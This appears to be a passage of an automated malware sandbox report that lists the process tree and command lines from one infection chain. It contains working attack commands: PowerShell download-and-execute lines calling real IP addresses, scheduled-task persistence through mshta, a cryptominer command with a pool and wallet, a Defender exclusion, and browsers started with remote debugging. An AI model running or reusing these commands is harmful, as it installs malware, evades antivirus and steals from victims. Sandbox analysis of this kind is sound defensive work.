PID 2052 wrote to memory of 3876 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2052 wrote to memory of 3876 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2052 wrote to memory of 3876 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1844 wrote to memory of 3548 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempDZN9N3X1URJGLADPWM2EIKIOWBQVZRLP.EXE
PID 1844 wrote to memory of 3548 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempDZN9N3X1URJGLADPWM2EIKIOWBQVZRLP.EXE
PID 1844 wrote to memory of 3548 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\TempDZN9N3X1URJGLADPWM2EIKIOWBQVZRLP.EXE
PID 1204 wrote to memory of 8 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1204 wrote to memory of 8 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1204 wrote to memory of 8 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 8 wrote to memory of 4316 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 8 wrote to memory of 4316 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 8 wrote to memory of 4316 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4896 wrote to memory of 2916 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10107540101\cnntXtU.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e.exe

"C:\Users\Admin\AppData\Local\Temp\f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e.exe"

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"

C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe

"C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\D64B.tmp\D64C.tmp\D64D.bat C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"

C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe

"C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe"

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe

"C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe"

C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe

"C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\installer.ps1"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\31xayw5v\31xayw5v.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES981.tmp" "c:\Users\Admin\AppData\Local\Temp\31xayw5v\CSC124C6D5AD9C742CBB436A684BDC2DF.TMP"

C:\Users\Admin\AppData\Local\Temp\10107440101\b1f64d5430.exe

"C:\Users\Admin\AppData\Local\Temp\10107440101\b1f64d5430.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /create /tn RDgJamaaXU3 /tr "mshta C:\Users\Admin\AppData\Local\Temp\e90hfFDx3.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta C:\Users\Admin\AppData\Local\Temp\e90hfFDx3.hta

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn RDgJamaaXU3 /tr "mshta C:\Users\Admin\AppData\Local\Temp\e90hfFDx3.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'DZN9N3X1URJGLADPWM2EIKIOWBQVZRLP.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10107450121\am_no.cmd" "

C:\Windows\SysWOW64\timeout.exe

timeout /t 2

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Users\Admin\AppData\Local\TempDZN9N3X1URJGLADPWM2EIKIOWBQVZRLP.EXE

"C:\Users\Admin\AppData\Local\TempDZN9N3X1URJGLADPWM2EIKIOWBQVZRLP.EXE"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Users\Admin\AppData\Local\Temp\10107540101\cnntXtU.exe

"C:\Users\Admin\AppData\Local\Temp\10107540101\cnntXtU.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn "cdohBmas9nm" /tr "mshta \"C:\Temp\ScsxbnLrP.hta\"" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta "C:\Temp\ScsxbnLrP.hta"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;

C:\Users\Admin\AppData\Local\Temp\10107550101\nhDLtPT.exe

"C:\Users\Admin\AppData\Local\Temp\10107550101\nhDLtPT.exe"

C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe

"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\ProgramData\dxukjxx\gmgc.exe

C:\ProgramData\dxukjxx\gmgc.exe

C:\Windows\System32\notepad.exe

--donate-level 2 -o pool.hashvault.pro:443 -u 494k9WqKJKFGDoD9MfnAcjEDcrHMmMNJTUun8rYFRYyPHyoHMJf5sesH79UoM8VfoGYevyzthG86r5BTGYZxmhENTzKajL3 -k -p x --cpu-max-threads-hint=40

C:\Users\Admin\AppData\Local\Temp\10107570101\Ps7WqSx.exe

"C:\Users\Admin\AppData\Local\Temp\10107570101\Ps7WqSx.exe"

C:\Windows\system32\tasklist.exe

tasklist /FI "PID eq 2356"

C:\Users\Admin\AppData\Local\Temp\10107580101\FvbuInU.exe

"C:\Users\Admin\AppData\Local\Temp\10107580101\FvbuInU.exe"

C:\Users\Admin\AppData\Local\Temp\10107590101\SvhQA35.exe

"C:\Users\Admin\AppData\Local\Temp\10107590101\SvhQA35.exe"

C:\Users\Admin\AppData\Local\Temp\onefile_1604_133856891668746722\chromium.exe

C:\Users\Admin\AppData\Local\Temp\10107590101\SvhQA35.exe

C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe

"C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe"

C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe

"C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3932 -ip 3932

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3932 -s 788

C:\Windows\system32\tasklist.exe

tasklist /FI "PID eq 2356"

C:\Users\Admin\AppData\Local\Temp\10107610101\ce4pMzk.exe

"C:\Users\Admin\AppData\Local\Temp\10107610101\ce4pMzk.exe"

C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe

"C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe"

C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe

"C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 5068 -ip 5068

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5068 -s 792

C:\Users\Admin\AppData\Local\Temp\10107630101\v6Oqdnc.exe

"C:\Users\Admin\AppData\Local\Temp\10107630101\v6Oqdnc.exe"

C:\Users\Admin\AppData\Local\Temp\10107640101\PcAIvJ0.exe

"C:\Users\Admin\AppData\Local\Temp\10107640101\PcAIvJ0.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\FAF5.tmp\FAF6.tmp\FAF7.bat C:\Users\Admin\AppData\Local\Temp\10107640101\PcAIvJ0.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"

C:\Windows\system32\tasklist.exe

tasklist /FI "PID eq 2356"

C:\Users\Admin\AppData\Local\Temp\10107650101\zY9sqWs.exe

"C:\Users\Admin\AppData\Local\Temp\10107650101\zY9sqWs.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Local\Caches\2CsAdXyX\Anubis.exe""

C:\Users\Admin\AppData\Local\Temp\10107660101\f6270156d1.exe

"C:\Users\Admin\AppData\Local\Temp\10107660101\f6270156d1.exe"

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffb2373cc40,0x7ffb2373cc4c,0x7ffb2373cc58

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1908,i,17132024125195243224,4801148823668781184,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1904 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2136,i,17132024125195243224,4801148823668781184,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2148 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2228,i,17132024125195243224,4801148823668781184,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2248 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3116,i,17132024125195243224,4801148823668781184,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3128 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3136,i,17132024125195243224,4801148823668781184,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3260 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4456,i,17132024125195243224,4801148823668781184,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4508 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4784,i,17132024125195243224,4801148823668781184,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4632 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4636,i,17132024125195243224,4801148823668781184,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4832 /prefetch:8

C:\Windows\system32\tasklist.exe

tasklist /FI "PID eq 2356"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4972,i,17132024125195243224,4801148823668781184,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5008 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\10107670101\96dce6476e.exe

"C:\Users\Admin\AppData\Local\Temp\10107670101\96dce6476e.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xe0,0x10c,0x7ffb22f346f8,0x7ffb22f34708,0x7ffb22f34718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,874244882713732196,283698810519119894,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2108 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2068,874244882713732196,283698810519119894,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2068,874244882713732196,283698810519119894,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2732 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2068,874244882713732196,283698810519119894,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3268 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2068,874244882713732196,283698810519119894,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3276 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\10107680101\cd3b193722.exe

"C:\Users\Admin\AppData\Local\Temp\10107680101\cd3b193722.exe"

C:\Users\Admin\AppData\Local\Temp\10107680101\cd3b193722.exe

"C:\Users\Admin\AppData\Local\Temp\10107680101\cd3b193722.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 5892 -ip 5892

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2068,874244882713732196,283698810519119894,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4660 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2068,874244882713732196,283698810519119894,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4732 /prefetch:1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5892 -s 808

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,874244882713732196,283698810519119894,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2120 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,874244882713732196,283698810519119894,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2508 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,874244882713732196,283698810519119894,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3880 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,874244882713732196,283698810519119894,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2292 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,874244882713732196,283698810519119894,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2388 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,874244882713732196,283698810519119894,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=2420 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,874244882713732196,283698810519119894,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=2496 /prefetch:2

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffb22f346f8,0x7ffb22f34708,0x7ffb22f34718

C:\Windows\system32\tasklist.exe

tasklist /FI "PID eq 2356"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

